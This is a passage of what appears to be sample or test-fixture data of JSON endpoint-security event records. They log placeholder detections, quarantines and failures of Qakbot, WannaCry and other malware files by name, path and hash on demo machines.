found"},"computer":{"connector_guid":"test_connector_guid","hostname":"Demo_Qakbot_1","external_ip":"8.8.8.8","active":true,"network_addresses":[{"ip":"10.10.10.10","mac":"f9:65:da:22:2a:41"}],"links":{"computer":"https://api.eu.amp.cisco.com/v1/computers/test_computer","trajectory":"https://api.eu.amp.cisco.com/v1/computers/test_computer/trajectory","group":"https://api.eu.amp.cisco.com/v1/groups/test_group"}},"file":{"disposition":"Malicious","identity":{"sha256":"12081e6ca366ad7d08368fbc7d4107605a9b75d27c671e7e0a58588f94be5837"}}}} -{"version":"v1.2.0","metadata":{"links":{"self":"https://api.eu.amp.cisco.com/v1/events?limit=500&offset=500","prev":"https://api.eu.amp.cisco.com/v1/events?limit=500&offset=0"},"results":{"total":972,"current_item_count":472,"index":500,"items_per_page":500}},"data":{"id":6411456342573187000,"timestamp":1610627534,"timestamp_nanoseconds":589000000,"date":"2021-01-14T12:32:14+00:00","event_type":"Retrospective Detection","event_type_id":553648147,"detection":"W32.GenericKD:Gen.20fu.1201","detection_id":"6411456342573187074","connector_guid":"test_connector_guid","group_guids":["test_group_guid"],"severity":"High","computer":{"connector_guid":"test_connector_guid","hostname":"Demo_Qakbot_1","external_ip":"8.8.8.8","active":true,"network_addresses":[{"ip":"10.10.10.10","mac":"f9:65:da:22:2a:41"}],"links":{"computer":"https://api.eu.amp.cisco.com/v1/computers/test_computer","trajectory":"https://api.eu.amp.cisco.com/v1/computers/test_computer/trajectory","group":"https://api.eu.amp.cisco.com/v1/groups/test_group"}},"file":{"disposition":"Malicious","file_name":"11179468.exe","file_path":"\\\\?\\C:\\Users\\johndoe\\AppData\\Local\\Temp\\11179468.exe","identity":{"sha256":"0b965ca8afea0638749b71ec6ad53f94e8bd9f9b359f1cb2e707dbe52f5d3960"}}}} -{"version":"v1.2.0","metadata":{"links":{"self":"https://api.eu.amp.cisco.com/v1/events?limit=500&offset=500","prev":"https://api.eu.amp.cisco.com/v1/events?limit=500&offset=0"},"results":{"total":972,"current_item_count":472,"index":500,"items_per_page":500}},"data":{"id":6411456342573187000,"timestamp":1610627534,"timestamp_nanoseconds":589000000,"date":"2021-01-14T12:32:14+00:00","event_type":"Retrospective Detection","event_type_id":553648147,"detection":"W32.GenericKD:Gen.20fu.1201","detection_id":"6411132837046517762","connector_guid":"test_connector_guid","group_guids":["test_group_guid"],"severity":"High","computer":{"connector_guid":"test_connector_guid","hostname":"Demo_Qakbot_1","external_ip":"8.8.8.8","active":true,"network_addresses":[{"ip":"10.10.10.10","mac":"f9:65:da:22:2a:41"}],"links":{"computer":"https://api.eu.amp.cisco.com/v1/computers/test_computer","trajectory":"https://api.eu.amp.cisco.com/v1/computers/test_computer/trajectory","group":"https://api.eu.amp.cisco.com/v1/groups/test_group"}},"file":{"disposition":"Malicious","file_name":"11179468.exe","file_path":"\\\\?\\C:\\Users\\johndoe\\AppData\\Local\\Temp\\11179468.exe","identity":{"sha256":"0b965ca8afea0638749b71ec6ad53f94e8bd9f9b359f1cb2e707dbe52f5d3960"}}}} -{"version":"v1.2.0","metadata":{"links":{"self":"https://api.eu.amp.cisco.com/v1/events?limit=500&offset=500","prev":"https://api.eu.amp.cisco.com/v1/events?limit=500&offset=0"},"results":{"total":972,"current_item_count":472,"index":500,"items_per_page":500}},"data":{"id":6411456342573187000,"timestamp":1610627534,"timestamp_nanoseconds":558000000,"date":"2021-01-14T12:32:14+00:00","event_type":"Retrospective Detection","event_type_id":553648147,"detection":"W32.12081E6CA3-95.SBX.TG","detection_id":"6411456342573187073","connector_guid":"test_connector_guid","group_guids":["test_group_guid"],"severity":"High","computer":{"connector_guid":"test_connector_guid","hostname":"Demo_Qakbot_1","external_ip":"8.8.8.8","active":true,"network_addresses":[{"ip":"10.10.10.10","mac":"f9:65:da:22:2a:41"}],"links":{"computer":"https://api.eu.amp.cisco.com/v1/computers/test_computer","trajectory":"https://api.eu.amp.cisco.com/v1/computers/test_computer/trajectory","group":"https://api.eu.amp.cisco.com/v1/groups/test_group"}},"file":{"disposition":"Malicious","file_name":"AySxs.exe","file_path":"\\\\?\\C:\\Users\\johndoe\\Documents\\AySxs.exe","identity":{"sha256":"12081e6ca366ad7d08368fbc7d4107605a9b75d27c671e7e0a58588f94be5837"}}}} -{"version":"v1.2.0","metadata":{"links":{"self":"https://api.eu.amp.cisco.com/v1/events?limit=500&offset=500","prev":"https://api.eu.amp.cisco.com/v1/events?limit=500&offset=0"},"results":{"total":972,"current_item_count":472,"index":500,"items_per_page":500}},"data":{"id":6411456342573187000,"timestamp":1610627534,"timestamp_nanoseconds":542000000,"date":"2021-01-14T12:32:14+00:00","event_type":"Retrospective Detection","event_type_id":553648147,"detection":"W32.12081E6CA3-95.SBX.TG","detection_id":"6411425813945647106","connector_guid":"test_connector_guid","group_guids":["test_group_guid"],"severity":"High","computer":{"connector_guid":"test_connector_guid","hostname":"Demo_Qakbot_1","external_ip":"8.8.8.8","active":true,"network_addresses":[{"ip":"10.10.10.10","mac":"f9:65:da:22:2a:41"}],"links":{"computer":"https://api.eu.amp.cisco.com/v1/computers/test_computer","trajectory":"https://api.eu.amp.cisco.com/v1/computers/test_computer/trajectory","group":"https://api.eu.amp.cisco.com/v1/groups/test_group"}},"file":{"disposition":"Malicious","file_name":"AySxs.exe","file_path":"\\\\?\\C:\\Users\\johndoe\\Documents\\AySxs.exe","identity":{"sha256":"12081e6ca366ad7d08368fbc7d4107605a9b75d27c671e7e0a58588f94be5837"}}}} -{"version":"v1.2.0","metadata":{"links":{"self":"https://api.eu.amp.cisco.com/v1/events?limit=500&offset=500","prev":"https://api.eu.amp.cisco.com/v1/events?limit=500&offset=0"},"results":{"total":972,"current_item_count":472,"index":500,"items_per_page":500}},"data":{"id":1492784107692000800,"timestamp":1610627262,"timestamp_nanoseconds":692000000,"date":"2021-01-14T12:27:42+00:00","event_type":"Cloud IOC","event_type_id":1107296274,"connector_guid":"test_connector_guid","group_guids":["test_group_guid"],"severity":"Critical","start_timestamp":1610627262,"start_date":"2021-01-14T12:27:42+00:00","computer":{"connector_guid":"test_connector_guid","hostname":"Demo_Qakbot_1","external_ip":"8.8.8.8","active":true,"network_addresses":[{"ip":"10.10.10.10","mac":"f9:65:da:22:2a:41"}],"links":{"computer":"https://api.eu.amp.cisco.com/v1/computers/test_computer","trajectory":"https://api.eu.amp.cisco.com/v1/computers/test_computer/trajectory","group":"https://api.eu.amp.cisco.com/v1/groups/test_group"}},"cloud_ioc":{"description":"Qakbot is a worm that spreads through network shares and removable drives. It downloads additional files, steals information, and opens a back door on the compromised computer. The worm also contains rootkit functionality to allow it to hide its presence. A command or file path similar to one used by Qakbot for spreading across the network or persistence was seen.","short_description":"W32.Qakbot.ioc"},"file":{"disposition":"Clean","file_name":"cmd.exe","file_path":"/C:/Windows/SysWOW64/cmd.exe","identity":{"sha256":"17f746d82695fa9b35493b41859d39d786d32b23a9d2e00f4011dec7a02402ae"},"parent":{"disposition":"Malicious","identity":{"sha256":"8063af71d08d015cc102788491c6274d3d33290b8dc41f91cc511a36fa0cba75"}}}}} -{"version":"v1.2.0","metadata":{"links":{"self":"https://api.eu.amp.cisco.com/v1/events?limit=500&offset=500","prev":"https://api.eu.amp.cisco.com/v1/events?limit=500&offset=0"},"results":{"total":972,"current_item_count":472,"index":500,"items_per_page":500}},"data":{"id":1458626002840536600,"timestamp":1610627243,"timestamp_nanoseconds":268148295,"date":"2021-01-14T12:27:23+00:00","event_type":"Threat Detected in Low Prevalence Executable","event_type_id":1107296278,"connector_guid":"test_connector_guid","group_guids":["test_group_guid"],"severity":"High","computer":{"connector_guid":"test_connector_guid","hostname":"Demo_Low_Prev_Retro","external_ip":"8.8.8.8","active":true,"network_addresses":[{"ip":"10.10.10.10","mac":"df:d1:ed:2d:c8:fc"}],"links":{"computer":"https://api.eu.amp.cisco.com/v1/computers/test_computer","trajectory":"https://api.eu.amp.cisco.com/v1/computers/test_computer/trajectory","group":"https://api.eu.amp.cisco.com/v1/groups/test_group"}},"file":{"disposition":"Malicious","file_name":"report.pdf.exe","identity":{"sha256":"d5221f6847978682234cb8ebfa951cb56b1323658679a820b168bbc1f5261a3b"}}}} -{"version":"v1.2.0","metadata":{"links":{"self":"https://api.eu.amp.cisco.com/v1/events?limit=500&offset=500","prev":"https://api.eu.amp.cisco.com/v1/events?limit=500&offset=0"},"results":{"total":972,"current_item_count":472,"index":500,"items_per_page":500}},"data":{"id":6583861114428195000,"timestamp":1610626750,"timestamp_nanoseconds":161000000,"date":"2021-01-14T12:19:10+00:00","event_type":"Policy Update","event_type_id":553648130,"connector_guid":"test_connector_guid","group_guids":["test_group_guid"],"computer":{"connector_guid":"test_connector_guid","hostname":"Demo_AMP_MAP_FriedEx","external_ip":"8.8.8.8","active":true,"network_addresses":[{"ip":"10.10.10.10","mac":"04:e6:4d:d5:7a:b5"}],"links":{"computer":"https://api.eu.amp.cisco.com/v1/computers/test_computer","trajectory":"https://api.eu.amp.cisco.com/v1/computers/test_computer/trajectory","group":"https://api.eu.amp.cisco.com/v1/groups/test_group"}}}} -{"version":"v1.2.0","metadata":{"links":{"self":"https://api.eu.amp.cisco.com/v1/events?limit=500&offset=500","prev":"https://api.eu.amp.cisco.com/v1/events?limit=500&offset=0"},"results":{"total":972,"current_item_count":472,"index":500,"items_per_page":500}},"data":{"id":6264747552596296000,"timestamp":1610626264,"timestamp_nanoseconds":27000000,"date":"2021-01-14T12:11:04+00:00","event_type":"File Fetch Completed","event_type_id":553648173,"connector_guid":"test_connector_guid","group_guids":["test_group_guid"],"computer":{"connector_guid":"test_connector_guid","hostname":"Demo_Low_Prev_Retro","external_ip":"8.8.8.8","active":true,"network_addresses":[{"ip":"10.10.10.10","mac":"df:d1:ed:2d:c8:fc"}],"links":{"computer":"https://api.eu.amp.cisco.com/v1/computers/test_computer","trajectory":"https://api.eu.amp.cisco.com/v1/computers/test_computer/trajectory","group":"https://api.eu.amp.cisco.com/v1/groups/test_group"}},"file":{"disposition":"Malicious","file_name":"report.pdf.exe","file_path":"\\\\?\\C:\\Users\\rsteadman\\Downloads\\report.pdf.exe","identity":{"sha256":"d5221f6847978682234cb8ebfa951cb56b1323658679a820b168bbc1f5261a3b","sha1":"5058b16a86beee96927371210b9a9f682976a50a","md5":"48a0bf05b9706a00d2a0ff6260412f11"}}}} -{"version":"v1.2.0","metadata":{"links":{"self":"https://api.eu.amp.cisco.com/v1/events?limit=500&offset=500","prev":"https://api.eu.amp.cisco.com/v1/events?limit=500&offset=0"},"results":{"total":972,"current_item_count":472,"index":500,"items_per_page":500}},"data":{"id":6411444887895409000,"timestamp":1610625778,"timestamp_nanoseconds":756000000,"date":"2021-01-14T12:02:58+00:00","event_type":"Threat Detected","event_type_id":1090519054,"detection":"Auto.A280012EEE.in10.tht.Talos","detection_id":"6411444887895408641","connector_guid":"test_connector_guid","group_guids":["test_group_guid"],"severity":"Medium","computer":{"connector_guid":"test_connector_guid","hostname":"Demo_Qakbot_2","external_ip":"8.8.8.8","user":"user@testdomain.com","active":true,"network_addresses":[{"ip":"10.10.10.10","mac":"d1:e2:b6:61:ef:7a"}],"links":{"computer":"https://api.eu.amp.cisco.com/v1/computers/test_computer","trajectory":"https://api.eu.amp.cisco.com/v1/computers/test_computer/trajectory","group":"https://api.eu.amp.cisco.com/v1/groups/test_group"}},"file":{"disposition":"Malicious","file_name":"X4.exe","file_path":"\\\\?\\C:\\Users\\johndoe\\Documents\\X4.exe","identity":{"sha256":"a280012eeedb19a9b4a7ddfb3c4dca316ce96ad376d98092351529c4db052e62","sha1":"c235e18bae63d6c4b5daadb833686f943de65a5f","md5":"a659ff79ef7ffacbd61d4c2641379e44"},"parent":{"process_id":4744,"disposition":"Clean","file_name":"wscript.exe","identity":{"sha256":"9c8a1b52a638ca87a5e7e60e635a3cbf89b04f5888995f55e2ad3d94ab009b97","sha1":"2131cff0959d213cd9a5e8a8ac362d265d5b1316","md5":"045451fa238a75305cc26ac982472367"}}}}} -{"version":"v1.2.0","metadata":{"links":{"self":"https://api.eu.amp.cisco.com/v1/events?limit=500&offset=500","prev":"https://api.eu.amp.cisco.com/v1/events?limit=500&offset=0"},"results":{"total":972,"current_item_count":472,"index":500,"items_per_page":500}},"data":{"id":6411444887895409000,"timestamp":1610625778,"timestamp_nanoseconds":772000000,"date":"2021-01-14T12:02:58+00:00","event_type":"Threat Quarantined","event_type_id":553648143,"detection_id":"6411444887895408641","connector_guid":"test_connector_guid","group_guids":["test_group_guid"],"severity":"Medium","computer":{"connector_guid":"test_connector_guid","hostname":"Demo_Qakbot_2","external_ip":"8.8.8.8","active":true,"network_addresses":[{"ip":"10.10.10.10","mac":"d1:e2:b6:61:ef:7a"}],"links":{"computer":"https://api.eu.amp.cisco.com/v1/computers/test_computer","trajectory":"https://api.eu.amp.cisco.com/v1/computers/test_computer/trajectory","group":"https://api.eu.amp.cisco.com/v1/groups/test_group"}},"file":{"disposition":"Malicious","identity":{"sha256":"a280012eeedb19a9b4a7ddfb3c4dca316ce96ad376d98092351529c4db052e62"}}}} -{"version":"v1.2.0","metadata":{"links":{"self":"https://api.eu.amp.cisco.com/v1/events?limit=500&offset=500","prev":"https://api.eu.amp.cisco.com/v1/events?limit=500&offset=0"},"results":{"total":972,"current_item_count":472,"index":500,"items_per_page":500}},"data":{"id":6419187549993959000,"timestamp":1610625537,"timestamp_nanoseconds":208000000,"date":"2021-01-14T11:58:57+00:00","event_type":"Quarantine Failure","event_type_id":2164260880,"detection_id":"6419187549993959449","connector_guid":"test_connector_guid","group_guids":["test_group_guid"],"severity":"Medium","error":{"error_code":3221225524,"description":"Object name not found"},"computer":{"connector_guid":"test_connector_guid","hostname":"Demo_WannaCry_Ransomware","external_ip":"8.8.8.8","active":true,"network_addresses":[{"ip":"10.10.10.10","mac":"53:74:31:cb:37:50"}],"links":{"computer":"https://api.eu.amp.cisco.com/v1/computers/test_computer","trajectory":"https://api.eu.amp.cisco.com/v1/computers/test_computer/trajectory","group":"https://api.eu.amp.cisco.com/v1/groups/test_group"}},"file":{"disposition":"Malicious","identity":{"sha256":"ed01ebfbc9eb5bbea545af4d01bf5f1071661840480439c6e5babe8e080e41aa"}}}} -{"version":"v1.2.0","metadata":{"links":{"self":"https://api.eu.amp.cisco.com/v1/events?limit=500&offset=500","prev":"https://api.eu.amp.cisco.com/v1/events?limit=500&offset=0"},"results":{"total":972,"current_item_count":472,"index":500,"items_per_page":500}},"data":{"id":6419187549993959000,"timestamp":1610625537,"timestamp_nanoseconds":193000000,"date":"2021-01-14T11:58:57+00:00","event_type":"Threat Detected","event_type_id":1090519054,"detection":"W32.Variant:Gen.20gl.1201","detection_id":"6419187549993959449","connector_guid":"test_connector_guid","group_guids":["test_group_guid"],"severity":"Medium","computer":{"connector_guid":"test_connector_guid","hostname":"Demo_WannaCry_Ransomware","external_ip":"8.8.8.8","user":"user@testdomain.com","active":true,"network_addresses":[{"ip":"10.10.10.10","mac":"53:74:31:cb:37:50"}],"links":{"computer":"https://api.eu.amp.cisco.com/v1/computers/test_computer","trajectory":"https://api.eu.amp.cisco.com/v1/computers/test_computer/trajectory","group":"https://api.eu.amp.cisco.com/v1/groups/test_group"}},"file":{"disposition":"Malicious","file_name":"tasksche.exe","file_path":"\\\\?\\C:\\WINDOWS\\tasksche.exe","identity":{"sha256":"ed01ebfbc9eb5bbea545af4d01bf5f1071661840480439c6e5babe8e080e41aa"},"parent":{"process_id":2980,"disposition":"Malicious","file_name":"mssecsvc.exe","identity":{"sha256":"24d004a104d4d54034dbcffc2a4b19a11f39008a575aa614ea04703480b1022c","sha1":"e889544aff85ffaf8b0d0da705105dee7c97fe26","md5":"db349b97c37d22f5ea1d1841e3c89eb4"}}}}} -{"version":"v1.2.0","metadata":{"links":{"self":"https://api.eu.amp.cisco.com/v1/events?limit=500&offset=500","prev":"https://api.eu.amp.cisco.com/v1/events?limit=500&offset=0"},"results":{"total":972,"current_item_count":472,"index":500,"items_per_page":500}},"data":{"id":6419187537109058000,"timestamp":1610625534,"timestamp_nanoseconds":853000000,"date":"2021-01-14T11:58:54+00:00","event_type":"Threat Detected","event_type_id":1090519054,"detection":"W32.File.MalParent","detection_id":"6419187537109057560","connector_guid":"test_connector_guid","group_guids":["test_group_guid"],"severity":"Medium","computer":{"connector_guid":"test_connector_guid","hostname":"Demo_WannaCry_Ransomware","external_ip":"8.8.8.8","user":"user@testdomain.com","active":true,"network_addresses":[{"ip":"10.10.10.10","mac":"53:74:31:cb:37:50"}],"links":{"computer":"https://api.eu.amp.cisco.com/v1/computers/test_computer","trajectory":"https://api.eu.amp.cisco.com/v1/computers/test_computer/trajectory","group":"https://api.eu.amp.cisco.com/v1/groups/test_group"}},"file":{"disposition":"Malicious","file_name":"tasksche.exe","file_path":"\\\\?\\C:\\Windows\\tasksche.exe","identity":{"sha256":"ed01ebfbc9eb5bbea545af4d01bf5f1071661840480439c6e5babe8e080e41aa","sha1":"5ff465afaabcbf0150d1a3ab2c2e74f3a4426467","md5":"84c82835a5d21bbcf75a61706d8ab549"},"parent":{"process_id":2980,"disposition":"Malicious","file_name":"mssecsvc.exe","identity":{"sha256":"24d004a104d4d54034dbcffc2a4b19a11f39008a575aa614ea04703480b1022c","sha1":"e889544aff85ffaf8b0d0da705105dee7c97fe26","md5":"db349b97c37d22f5ea1d1841e3c89eb4"}}}}} -{"version":"v1.2.0","metadata":{"links":{"self":"https://api.eu.amp.cisco.com/v1/events?limit=500&offset=500","prev":"https://api.eu.amp.cisco.com/v1/events?limit=500&offset=0"},"results":{"total":972,"current_item_count":472,"index":500,"items_per_page":500}},"data":{"id":6419187537109058000,"timestamp":1610625534,"timestamp_nanoseconds":884000000,"date":"2021-01-14T11:58:54+00:00","event_type":"Threat Quarantined","event_type_id":553648143,"detection_id":"6419187537109057560","connector_guid":"test_connector_guid","group_guids":["test_group_guid"],"severity":"Medium","computer":{"connector_guid":"test_connector_guid","hostname":"Demo_WannaCry_Ransomware","external_ip":"8.8.8.8","active":true,"network_addresses":[{"ip":"10.10.10.10","mac":"53:74:31:cb:37:50"}],"links":{"computer":"https://api.eu.amp.cisco.com/v1/computers/test_computer","trajectory":"https://api.eu.amp.cisco.com/v1/computers/test_computer/trajectory","group":"https://api.eu.amp.cisco.com/v1/groups/test_group"}},"file":{"disposition":"Malicious","identity":{"sha256":"ed01ebfbc9eb5bbea545af4d01bf5f1071661840480439c6e5babe8e080e41aa"}}}} -{"version":"v1.2.0","metadata":{"links":{"self":"https://api.eu.amp.cisco.com/v1/events?limit=500&offset=500","prev":"https://api.eu.amp.cisco.com/v1/events?limit=500&offset=0"},"results":{"total":972,"current_item_count":472,"index":500,"items_per_page":500}},"data":{"id":6583853374897127000,"timestamp":1610624948,"timestamp_nanoseconds":562000000,"date":"2021-01-14T11:49:08+00:00","event_type":"Policy Update","event_type_id":553648130,"connector_guid":"test_connector_guid","group_guids":["test_group_guid"],"computer":{"connector_guid":"test_connector_guid","hostname":"Demo_AMP_MAP_FriedEx","external_ip":"8.8.8.8","active":true,"network_addresses":[{"ip":"10.10.10.10","mac":"04:e6:4d:d5:7a:b5"}],"links":{"computer":"https://api.eu.amp.cisco.com/v1/computers/test_computer","trajectory":"https://api.eu.amp.cisco.com/v1/computers/test_computer/trajectory","group":"https://api.eu.amp.cisco.com/v1/groups/test_group"}}}} -{"version":"v1.2.0","metadata":{"links":{"self":"https://api.eu.amp.cisco.com/v1/events?limit=500&offset=500","prev":"https://api.eu.amp.cisco.com/v1/events?limit=500&offset=0"},"results":{"total":972,"current_item_count":472,"index":500,"items_per_page":500}},"data":{"id":14945825043963,"timestamp":1610624472,"timestamp_nanoseconds":496121997,"date":"2021-01-14T11:41:12+00:00","event_type":"Executed malware","event_type_id":1107296272,"detection":"W32.ED01EBFBC9-100.SBX.TG","connector_guid":"test_connector_guid","group_guids":["test_group_guid"],"severity":"High","start_timestamp":1610624472,"start_date":"2021-01-14T11:41:12+00:00","computer":{"connector_guid":"test_connector_guid","hostname":"Demo_WannaCry_Ransomware","external_ip":"8.8.8.8","active":true,"network_addresses":[{"ip":"10.10.10.10","mac":"53:74:31:cb:37:50"}],"links":{"computer":"https://api.eu.amp.cisco.com/v1/computers/test_computer","trajectory":"https://api.eu.amp.cisco.com/v1/computers/test_computer/trajectory","group":"https://api.eu.amp.cisco.com/v1/groups/test_group"}},"file":{"disposition":"Malicious","identity":{"sha256":"ed01ebfbc9eb5bbea545af4d01bf5f1071661840480439c6e5babe8e080e41aa"},"parent":{"disposition":"Malicious","identity":{"sha256":"24d004a104d4d54034dbcffc2a4b19a11f39008a575aa614ea04703480b1022c"}}}}} -{"version":"v1.2.0","metadata":{"links":{"self":"https://api.eu.amp.cisco.com/v1/events?limit=500&offset=500","prev":"https://api.eu.amp.cisco.com/v1/events?limit=500&offset=0"},"results":{"total":972,"current_item_count":472,"index":500,"items_per_page":500}},"data":{"id":14945825043964,"timestamp":1610624472,"timestamp_nanoseconds":498576872,"date":"2021-01-14T11:41:12+00:00","event_type":"Multiple Infected Files","event_type_id":1107296258,"detection":"W32.ED01EBFBC9-100.SBX.TG","connector_guid":"test_connector_guid","group_guids":["test_group_guid"],"severity":"High","start_timestamp":1610624472,"start_date":"2021-01-14T11:41:12+00:00","computer":{"connector_guid":"test_connector_guid","hostname":"Demo_WannaCry_Ransomware","external_ip":"8.8.8.8","active":true,"network_addresses":[{"ip":"10.10.10.10","mac":"53:74:31:cb:37:50"}],"links":{"computer":"https://api.eu.amp.cisco.com/v1/computers/test_computer","trajectory":"https://api.eu.amp.cisco.com/v1/computers/test_computer/trajectory","group":"https://api.eu.amp.cisco.com/v1/groups/test_group"}},"file":{"disposition":"Malicious","identity":{"sha256":"ed01ebfbc9eb5bbea545af4d01bf5f1071661840480439c6e5babe8e080e41aa"},"parent":{"disposition":"Malicious","identity":{"sha256":"24d004a104d4d54034dbcffc2a4b19a11f39008a575aa614ea04703480b1022c"}}}}} -{"version":"v1.2.0","metadata":{"links":{"self":"https://api.eu.amp.cisco.com/v1/events?limit=500&offset=500","prev":"https://api.eu.amp.cisco.com/v1/events?limit=500&offset=0"},"results":{"total":972,"current_item_count":472,"index":500,"items_per_page":500}},"data":{"id":6533671599780921000,"timestamp":1610623726,"timestamp_nanoseconds":440000000,"date":"2021-01-14T11:28:46+00:00","event_type":"Retrospective Quarantine","event_type_id":553648155,"detection_id":"6533671595485954049","connector_guid":"test_connector_guid","group_guids":["test_group_guid"],"severity":"High","computer":{"connector_guid":"test_connector_guid","hostname":"Demo_AMP_Exploit_Prevention_Audit","external_ip":"8.8.8.8","active":true,"network_addresses":[{"ip":"10.10.10.10","mac":"d2:78:15:4a:f4:a2"}],"links":{"computer":"https://api.eu.amp.cisco.com/v1/computers/test_computer","trajectory":"https://api.eu.amp.cisco.com/v1/computers/test_computer/trajectory","group":"https://api.eu.amp.cisco.com/v1/groups/test_group"}},"file":{"disposition":"Malicious","identity":{"sha256":"fce5b6784dc9f44cdc1d6214bb7b68d3029db049dcaf734edc9660bb3373bc79"}}}} -{"version":"v1.2.0","metadata":{"links":{"self":"https://api.eu.amp.cisco.com/v1/events?limit=500&offset=500","prev":"https://api.eu.amp.cisco.com/v1/events?limit=500&offset=0"},"results":{"total":972,"current_item_count":472,"index":500,"items_per_page":500}},"data":{"id":6533671595485954000,"timestamp":1610623725,"timestamp_nanoseconds":899000000,"date":"2021-01-14T11:28:45+00:00","event_type":"Retrospective Detection","event_type_id":553648147,"detection":"W32.FCE5B6784D-100.SBX.TG","detection_id":"6533671595485954049","connector_guid":"test_connector_guid","group_guids":["test_group_guid"],"severity":"High","computer":{"connector_guid":"test_connector_guid","hostname":"Demo_AMP_Exploit_Prevention_Audit","external_ip":"8.8.8.8","active":true,"network_addresses":[{"ip":"10.10.10.10","mac":"d2:78:15:4a:f4:a2"}],"links":{"computer":"https://api.eu.amp.cisco.com/v1/computers/test_computer","trajectory":"https://api.eu.amp.cisco.com/v1/computers/test_computer/trajectory","group":"https://api.eu.amp.cisco.com/v1/groups/test_group"}},"file":{"disposition":"Malicious","file_name":"pp32.exe","file_path":"\\\\?\\C:\\pp32.exe","identity":{"sha256":"fce5b6784dc9f44cdc1d6214bb7b68d3029db049dcaf734edc9660bb3373bc79","sha1":"bdb11107a33eaeded6a838eb2a0e6167637dbe9c","md5":"5df0c4ebca109779dc8afc745d612637"}}}} -{"version":"v1.2.0","metadata":{"links":{"self":"https://api.eu.amp.cisco.com/v1/events?limit=500&offset=500","prev":"https://api.eu.amp.cisco.com/v1/events?limit=500&offset=0"},"results":{"total":972,"current_item_count":472,"index":500,"items_per_page":500}},"data":{"id":6419179222052372000,"timestamp":1610623598,"timestamp_nanoseconds":453000000,"date":"2021-01-14T11:26:38+00:00","event_type":"Quarantine Failure","event_type_id":2164260880,"detection_id":"6419179222052372503","connector_guid":"test_connector_guid","group_guids":["test_group_guid"],"severity":"Medium","error":{"error_code":3221225524,"description":"Object name not found"},"computer":{"connector_guid":"test_connector_guid","hostname":"Demo_WannaCry_Ransomware","external_ip":"8.8.8.8","active":true,"network_addresses":[{"ip":"10.10.10.10","mac":"53:74:31:cb:37:50"}],"links":{"computer":"https://api.eu.amp.cisco.com/v1/computers/test_computer","trajectory":"https://api.eu.amp.cisco.com/v1/computers/test_computer/trajectory","group":"https://api.eu.amp.cisco.com/v1/groups/test_group"}},"file":{"disposition":"Malicious","identity":{"sha256":"ed01ebfbc9eb5bbea545af4d01bf5f1071661840480439c6e5babe8e080e41aa"}}}} -{"version":"v1.2.0","metadata":{"links":{"self":"https://api.eu.amp.cisco.com/v1/events?limit=500&offset=500","prev":"https://api.eu.amp.cisco.com/v1/events?limit=500&offset=0"},"results":{"total":972,"current_item_count":472,"index":500,"items_per_page":500}},"data":{"id":6419179222052372000,"timestamp":1610623598,"timestamp_nanoseconds":437000000,"date":"2021-01-14T11:26:38+00:00","event_type":"Threat Detected","event_type_id":1090519054,"detection":"W32.File.MalParent","detection_id":"6419179222052372503","connector_guid":"test_connector_guid","group_guids":["test_group_guid"],"severity":"Medium","computer":{"connector_guid":"test_connector_guid","hostname":"Demo_WannaCry_Ransomware","external_ip":"8.8.8.8","user":"user@testdomain.com","active":true,"network_addresses":[{"ip":"10.10.10.10","mac":"53:74:31:cb:37:50"}],"links":{"computer":"https://api.eu.amp.cisco.com/v1/computers/test_computer","trajectory":"https://api.eu.amp.cisco.com/v1/computers/test_computer/trajectory","group":"https://api.eu.amp.cisco.com/v1/groups/test_group"}},"file":{"disposition":"Malicious","file_name":"tasksche.exe","file_path":"\\\\?\\C:\\ProgramData\\qzkbplcgew884\\tasksche.exe","identity":{"sha256":"ed01ebfbc9eb5bbea545af4d01bf5f1071661840480439c6e5babe8e080e41aa"}}}} -{"version":"v1.2.0","metadata":{"links":{"self":"https://api.eu.amp.cisco.com/v1/events?limit=500&offset=500","prev":"https://api.eu.amp.cisco.com/v1/events?limit=500&offset=0"},"results":{"total":972,"current_item_count":472,"index":500,"items_per_page":500}},"data":{"id":6419179217757405000,"timestamp":1610623597,"timestamp_nanoseconds":875000000,"date":"2021-01-14T11:26:37+00:00","event_type":"Quarantine Failure","event_type_id":2164260880,"detection_id":"6419179217757405206","connector_guid":"test_connector_guid","group_guids":["test_group_guid"],"severity":"Medium","error":{"error_code":3221225524,"description":"Object name not found"},"computer":{"connector_guid":"test_connector_guid","hostname":"Demo_WannaCry_Ransomware","external_ip":"8.8.8.8","active":true,"network_addresses":[{"ip":"10.10.10.10","mac":"53:74:31:cb:37:50"}],"links":{"computer":"https://api.eu.amp.cisco.com/v1/computers/test_computer","trajectory":"https://api.eu.amp.cisco.com/v1/computers/test_computer/trajectory","group":"https://api.eu.amp.cisco.com/v1/groups/test_group"}},"file":{"disposition":"Malicious","identity":{"sha256":"ed01ebfbc9eb5bbea545af4d01bf5f1071661840480439c6e5babe8e080e41aa"}}}} -{"version":"v1.2.0","metadata":{"links":{"self":"https://api.eu.amp.cisco.com/v1/events?limit=500&offset=500","prev":"https://api.eu.amp.cisco.com/v1/events?limit=500&offset=0"},"results":{"total":972,"current_item_count":472,"index":500,"items_per_page":500}},"data":{"id":6419179217757405000,"timestamp":1610623597,"timestamp_nanoseconds":860000000,"date":"2021-01-14T11:26:37+00:00","event_type":"Quarantine Failure","event_type_id":2164260880,"detection_id":"6419179217757405205","connector_guid":"test_connector_guid","group_guids":["test_group_guid"],"severity":"Medium","error":{"error_code":3221225524,"description":"Object name not found"},"computer":{"connector_guid":"test_connector_guid","hostname":"Demo_WannaCry_Ransomware","external_ip":"8.8.8.8","active":true,"network_addresses":[{"ip":"10.10.10.10","mac":"53:74:31:cb:37:50"}],"links":{"computer":"https://api.eu.amp.cisco.com/v1/computers/test_computer","trajectory":"https://api.eu.amp.cisco.com/v1/computers/test_computer/trajectory","group":"https://api.eu.amp.cisco.com/v1/groups/test_group"}},"file":{"disposition":"Malicious","identity":{"sha256":"ed01ebfbc9eb5bbea545af4d01bf5f1071661840480439c6e5babe8e080e41aa"}}}} -{"version":"v1.2.0","metadata":{"links":{"self":"https://api.eu.amp.cisco.com/v1/events?limit=500&offset=500","prev":"https://api.eu.amp.cisco.com/v1/events?limit=500&offset=0"},"results":{"total":972,"current_item_count":472,"index":500,"items_per_page":500}},"data":{"id":6419179217757405000,"timestamp":1610623597,"timestamp_nanoseconds":579000000,"date":"2021-01-14T11:26:37+00:00","event_type":"Quarantine Failure","event_type_id":2164260880,"detection_id":"6419179217757405204","connector_guid":"test_connector_guid","group_guids":["test_group_guid"],"severity":"Medium","error":{"error_code":3221225524,"description":"Object name not 